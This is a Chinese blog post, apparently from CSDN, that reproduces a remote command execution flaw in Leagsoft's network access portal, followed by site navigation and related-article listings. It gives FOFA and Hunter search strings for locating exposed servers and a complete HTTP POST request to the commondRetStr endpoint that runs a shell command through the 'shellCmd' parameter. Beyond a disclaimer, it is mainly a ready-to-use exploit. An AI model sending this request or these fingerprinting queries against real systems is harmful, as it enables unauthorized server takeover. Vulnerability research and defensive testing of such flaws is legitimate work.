【漏洞复现】联软科技安全准入门户平台 commondRetStr 存在远程命令执行漏洞

最新推荐文章于 2024-06-14 12:23:50 发布
最新推荐文章于 2024-06-14 12:23:50 发布
阅读量282 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137061515
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

联软科技是全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 commondRetStr 处存在远程代码执行漏洞,攻击者可以获取服务器权限。

二、影响版本

  • 联软科技安全准入门户平台

三、资产测绘

  • hunter:web.icon=="ae4facf2c5ca438696b5aa73379d955c"
  • fofa:"UniSSOView"

image-20240326233138019

四、漏洞复现

POST /TunnelGateway/commondRetStr HTTP/1.1
Host: 
User-Agent: Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.9
Content-Length: 11
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: sdp_jsessionid=AA249E70ED8C27AEBF5623728AEA3F41
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

shellCmd=id

image-20240326232811292

E_cho234
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
联软 IT 安全运维管理软件反序列化漏洞复现
0xSec
11-30 1992
联软IT安全运维管理软件,在 PolicySetDetailController 中 的queryPolicyUseConditionDetail 方法在对输入参数进行处理的过程中进行了反序列化操作,可使用 Commons-Beanutils 反序列化链进行RCE。攻击者可利用该漏洞执行任意代码,在服务器上执行命令、打入内存马等操作,获取服务器权限。
联软科技安全准入门户平台commondRetStr接口RCE漏洞复现[附POC]
薛定谔嘚喵博客
04-28 460
联软科技是全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 /commondRetStr接口处存在远程代码执行漏洞,攻击者可以获取服务器权限。
联软科技产品「准入存在任意文件上传和命令执行漏洞
m0_48520508的博客
09-25 4938
1、准入系统概述 网络准入这一概念是由思科发起、后续由华为、联软、北信源等多家厂商根据此概念,基于在NACC、802.1x、EOU、WebAuth、MAB、IAB的基础上进行自主研发的一门新兴技术。其宗旨是防止病毒和蠕虫等新兴黑客技术对企业安全造成危害,为企业建设一套网络安全体系。 2、联软UniNAC网络准入控制系统功能 • 发现 自动发现网络设备、自动发现接入设备、自动发现网络拓扑; 自动发现接入设备的类型,包
漏洞复现联软科技安全准入门户平台RCE(命令执行)漏洞
dzqxwzoe的博客
01-26 1187
联软科技安全准入门户平台 commondRetStr存在远程代码执行漏洞,攻击者可以获取服务器权限。
0day!联软科技安全准入门户平台commondRetStr存在远程命令执行
weixin_43167326的博客
03-27 676
深圳市联软科技股份有限公司(简称“联软科技”)创立于2004年,专注于企业级网络安全市场,围绕端点安全、边界安全和云安全,为政企客户提供网络安全产品和服务,打造了网络准入控制、终端安全管理、云主机安全管理、终端检测与响应等产品的综合安全解决方案。
泛微最新漏洞汇总----实时更新!!!_泛微漏洞(2),系统学网络安全从零开始
erthre的博客
04-16 554
app.name=“泛微 e-cology 9.0 OA”
「数据安全」网约车准入AI产品安全实践 - 漏洞分析.zip
11-27
「数据安全」网约车准入AI产品安全实践 - 漏洞分析 安全认证 NGFW 企业安全 安全研究 数据安全
2023年安全准入考试题库电力监控专业.docx
02-23
单选 1. 调控机构调控运行、自动化、通信专业每月应组织( )次月度专业演练,校验主、备调技术支持系统技术及管理资料的一致性、可用性...9. 若需变更或增设安全措施者,应( )新的工作票 。 A.填用 10. 网络与安防设
2023年安全准入考试题库(电力监控专业).xls
02-21
6.试验和推广电力监控系统新技术、新设备,应制定相应的安全措施,经本单位批准后执行。涉及上级业务系统的,需经上级部门许可审核,( )批准后执行。 7.《国家电网公司防止电气误操作安全管理规定》指出,新建变电...
煤矿高压供用电设备安全准入测试能力建设探讨
05-23
介绍了煤矿高压供用电设备的技术现状、安全现状及其安全准入测试能力现状,分析了安全准入测试能力发展存在的主要问题。结合煤矿高压供用电系统安全准入分析验证实验室建设项目,从大容量试验电源、开关电器、变频电...
某国内知名机械制造股份有限公司选择联软构建网络准入控制系统_信息安全解决方案.pdf
07-30
某国内知名机械制造股份有限公司选择联软构建网络准入控制系统_信息安全解决方案.pdf
联软安界UniSDP软件定义边界系统命令执行(含批量验证poc)
weixin_43567873的博客
04-05 199
联软安界UniSDP软件定义边界系统命令执行(含批量验证poc)
2020 HW记录-2
qq_22807425的博客
09-11 1132
2020 HW记录-2 0x00 前言 9.11 hw开始了,记录下整个hw期间爆的0day虽然自己有点想法 有所收获,碍于信息比较敏感的缘故,还是hw结束后再发这儿比较好。hw可是个学习的好机会啊,冲鸭大伙儿 0x02 漏洞 一.常规漏洞 1.Apache DolphinScheduler高危漏洞 漏洞编号:CVE-2020-11974、CVE-2020-13922暂无poc 1.1Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922) 受影响版本 Apac
2020HW漏洞总结(三)
weixin_45358803的博客
09-27 6963
来自IDLab整理的漏洞详情 01.联软任意文件上传漏洞 • 已知存在漏洞的url如下: http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(只有201904-1SP起才存在漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/…;/…;/updateDevUploa
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 465
网络安全管理组织架构复习
【等保资料】等级保护定级指南及网络安全解读(ppt原件)
最新发布
xx_123321456的博客
06-14 285
新版网络安全等级保护定级指南网络安全等级保护工作的作用对象,主要包括基础信息网络、工业控制系统、云计算平台、物联网、使用移动互联技术的网络和大数据等。
网络安全等级保护基本要求解读- 安全计算环境-应用系统和数据安全
2403_84237550的博客
06-13 1770
息的难度,应保证用户的鉴别信息具有一定的复杂性,从而使身份鉴别信息。务系统的窗口,应用系统面临更多的安全威胁;别技术对应用系统的用户进行身份鉴别,且其中一种鉴别技术至少应使用。如管理用户仅需具备相关的管理操作,则无需为其分配业务操作的权限;本条款要求应用系统必须对应用系统所有用户的重要操作(如用户登录。才能明确测评的范围和对象,分析其系统的脆弱性和面临的主要安全。为了防止非授权用户对应用系统用户的身份鉴别信息进行暴力猜测,应用系统的管理员要及时将应用系统中多余的、过期的账户删除或停。
高校实验室安全准入教程
07-17
高校实验室安全准入教程是为了确保实验室安全、保护实验人员和设备的安全,以及遵守相关法规和规定。以下是一份高校实验室安全准入教程的示例: 1. 实验室安全准入申请:实验人员在进入实验室之前,需要提交实验室安全准入申请。申请表中包括个人信息、实验室名称、实验项目、预期使用的设备和化学品等内容。 2. 安全培训和考核:实验人员需要参加安全培训并通过相应的考核,以确保其了解实验室安全规定、紧急处理措施和个人防护装备的正确使用方法。 3. 实验室安全设施:介绍实验室内的安全设施,如紧急停电按钮、紧急洗眼器和淋浴器、灭火器等。说明正确使用这些设施的方法和注意事项。 4. 化学品管理:介绍化学品的分类和标识系统,以及储存和处理化学品时的注意事项。强调正确使用防护设备、避免混合化学品和妥善处理废弃物。 5. 实验操作规范:说明实验室中的操作规范,如正确使用实验器材、操作化学品时的安全措施、实验过程中的注意事项等。 6. 紧急处理措施:介绍常见的紧急情况处理措施,如火灾、泄漏和意外伤害等。包括逃生路线、报警方法、急救措施等。 7. 个人防护装备:介绍个人防护装备的类型和正确使用方法,如实验服、手套、护目镜、口罩等。强调实验人员在进入实验室时必须佩戴适当的个人防护装备。 8. 安全意识培养:强调实验人员的安全意识和责任,鼓励他们主动发现和报告潜在的安全隐患,并提供安全问题反馈和解决渠道。 9. 安全监督和检查:介绍实验室安全监督和检查的机制,包括定期巡视、安全演练和事故调查等。重点强调实验室安全是每个人的责任,违反安全规定将受到相应的处罚。 10. 培训证书颁发:合格完成实验室安全准入教程的人员将获得培训证书,证明他们已经具备进入实验室进行实验操作的资格。 这只是一个示例教程的提纲,实际的教程内容应根据不同学校和实验室的需求进行详细编写,并结合相关法规和规定进行修订。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值